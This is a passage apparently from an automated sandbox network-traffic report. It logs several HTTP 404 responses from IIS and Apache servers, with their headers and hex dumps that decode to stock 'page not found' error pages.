30 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 3c 54 52 3e 3c 54 44 3e 0d 0a 0d 0a 3c 68 31 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 50 6c 65 61 73 65 20 74 72 79 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 3a 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e 4d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 64 72 65 73 73 20 64 69 73 70 6c 61 79 65 64 20 69 6e 20 74 68 65 20 61 64 64 72 65 73 73 20 62 61 72 20 6f 66 20 79 6f 75 72 20 62 72 6f 77 73 65 72 20 69 73 20 73 70 65 6c 6c 65 64 20 61 6e 64 20 66 6f 72 6d 61 74 74 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 49 66 20 79 6f 75 20 72 65 61 63 68 65 64 20 74 68 69 73 20 70 61 67 65 20 62 79 20 63 6c 69 63 6b 69 6e 67 20 61 20 6c 69 6e 6b 2c 20 63 6f 6e 74 61 63 74 0d 0a 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 74 6f 20 61 6c 65 72 74 20 74 68 65 6d 20 74 68 61 74 20 74 68 65 20 6c 69 6e 6b 20 69 73 20 69 6e 63 6f 72 72 65 63 74 6c 79 20 66 6f 72 6d 61 74 74 65 64 2e 0d 0a 3c 2f 6c 69 3e 0d 0a
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1635Content-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETDate: Sat, 02 Dec 2023 01:09:30 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 57 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0d 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 33 70 74 2f 31 35 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0d 0a 3c 2f 53 54 59 4c 45 3e 0d 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 54 41 42 4c 45 20 77 69 64 74 68 3d 35 30 30 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 3c 54 52 3e 3c 54 44 3e 0d 0a 0d 0a 3c 68 31 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 50 6c 65 61 73 65 20 74 72 79 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 3a 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e 4d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 64 72 65 73 73 20 64 69 73 70 6c 61 79 65 64 20 69 6e 20 74 68 65 20 61 64 64 72 65 73 73 20 62 61 72 20 6f 66 20 79 6f 75 72 20 62 72 6f 77 73 65 72 20 69 73 20 73 70 65 6c 6c 65 64 20 61 6e 64 20 66 6f 72 6d 61 74 74 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 49 66 20 79 6f 75 20 72 65 61 63 68 65 64 20 74 68 69 73 20 70 61 67 65 20 62 79 20 63 6c 69 63 6b 69 6e 67 20 61 20 6c 69 6e 6b 2c 20 63 6f 6e 74 61 63 74 0d 0a 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 74 6f 20 61 6c 65 72 74 20 74 68 65 6d 20 74 68 61 74 20 74 68 65 20 6c 69 6e 6b 20 69 73 20 69 6e 63 6f 72 72 65 63 74 6c 79 20 66 6f 72 6d 61 74 74 65 64 2e 0d 0a 3c 2f 6c 69 3e 0d 0a
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1635Content-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETDate: Sat, 02 Dec 2023 01:09:30 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 57 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0d 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 33 70 74 2f 31 35 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0d 0a 3c 2f 53 54 59 4c 45 3e 0d 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 54 41 42 4c 45 20 77 69 64 74 68 3d 35 30 30 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 3c 54 52 3e 3c 54 44 3e 0d 0a 0d 0a 3c 68 31 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 50 6c 65 61 73 65 20 74 72 79 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 3a 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e 4d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 64 72 65 73 73 20 64 69 73 70 6c 61 79 65 64 20 69 6e 20 74 68 65 20 61 64 64 72 65 73 73 20 62 61 72 20 6f 66 20 79 6f 75 72 20 62 72 6f 77 73 65 72 20 69 73 20 73 70 65 6c 6c 65 64 20 61 6e 64 20 66 6f 72 6d 61 74 74 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 49 66 20 79 6f 75 20 72 65 61 63 68 65 64 20 74 68 69 73 20 70 61 67 65 20 62 79 20 63 6c 69 63 6b 69 6e 67 20 61 20 6c 69 6e 6b 2c 20 63 6f 6e 74 61 63 74 0d 0a 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 74 6f 20 61 6c 65 72 74 20 74 68 65 6d 20 74 68 61 74 20 74 68 65 20 6c 69 6e 6b 20 69 73 20 69 6e 63 6f 72 72 65 63 74 6c 79 20 66 6f 72 6d 61 74 74 65 64 2e 0d 0a 3c 2f 6c 69 3e 0d 0a
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1635Content-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETDate: Sat, 02 Dec 2023 01:09:30 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 57 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0d 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 33 70 74 2f 31 35 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0d 0a 3c 2f 53 54 59 4c 45 3e 0d 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 54 41 42 4c 45 20 77 69 64 74 68 3d 35 30 30 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 3c 54 52 3e 3c 54 44 3e 0d 0a 0d 0a 3c 68 31 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 50 6c 65 61 73 65 20 74 72 79 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 3a 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e 4d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 64 72 65 73 73 20 64 69 73 70 6c 61 79 65 64 20 69 6e 20 74 68 65 20 61 64 64 72 65 73 73 20 62 61 72 20 6f 66 20 79 6f 75 72 20 62 72 6f 77 73 65 72 20 69 73 20 73 70 65 6c 6c 65 64 20 61 6e 64 20 66 6f 72 6d 61 74 74 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 49 66 20 79 6f 75 20 72 65 61 63 68 65 64 20 74 68 69 73 20 70 61 67 65 20 62 79 20 63 6c 69 63 6b 69 6e 67 20 61 20 6c 69 6e 6b 2c 20 63 6f 6e 74 61 63 74 0d 0a 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 74 6f 20 61 6c 65 72 74 20 74 68 65 6d 20 74 68 61 74 20 74 68 65 20 6c 69 6e 6b 20 69 73 20 69 6e 63 6f 72 72 65 63 74 6c 79 20 66 6f 72 6d 61 74 74 65 64 2e 0d 0a 3c 2f 6c 69 3e 0d 0a
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1635Content-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETDate: Sat, 02 Dec 2023 01:09:30 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 57 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0d 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 33 70 74 2f 31 35 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0d 0a 3c 2f 53 54 59 4c 45 3e 0d 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 54 41 42 4c 45 20 77 69 64 74 68 3d 35 30 30 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 3c 54 52 3e 3c 54 44 3e 0d 0a 0d 0a 3c 68 31 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 50 6c 65 61 73 65 20 74 72 79 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 3a 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e 4d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 64 72 65 73 73 20 64 69 73 70 6c 61 79 65 64 20 69 6e 20 74 68 65 20 61 64 64 72 65 73 73 20 62 61 72 20 6f 66 20 79 6f 75 72 20 62 72 6f 77 73 65 72 20 69 73 20 73 70 65 6c 6c 65 64 20 61 6e 64 20 66 6f 72 6d 61 74 74 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 49 66 20 79 6f 75 20 72 65 61 63 68 65 64 20 74 68 69 73 20 70 61 67 65 20 62 79 20 63 6c 69 63 6b 69 6e 67 20 61 20 6c 69 6e 6b 2c 20 63 6f 6e 74 61 63 74 0d 0a 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 74 6f 20 61 6c 65 72 74 20 74 68 65 6d 20 74 68 61 74 20 74 68 65 20 6c 69 6e 6b 20 69 73 20 69 6e 63 6f 72 72 65 63 74 6c 79 20 66 6f 72 6d 61 74 74 65 64 2e 0d 0a 3c 2f 6c 69 3e 0d 0a
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 01:09:32 GMTServer: ApacheContent-Length: 315Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Fri, 01 Dec 2023 22:09:31 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Fri, 01 Dec 2023 22:09:31 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 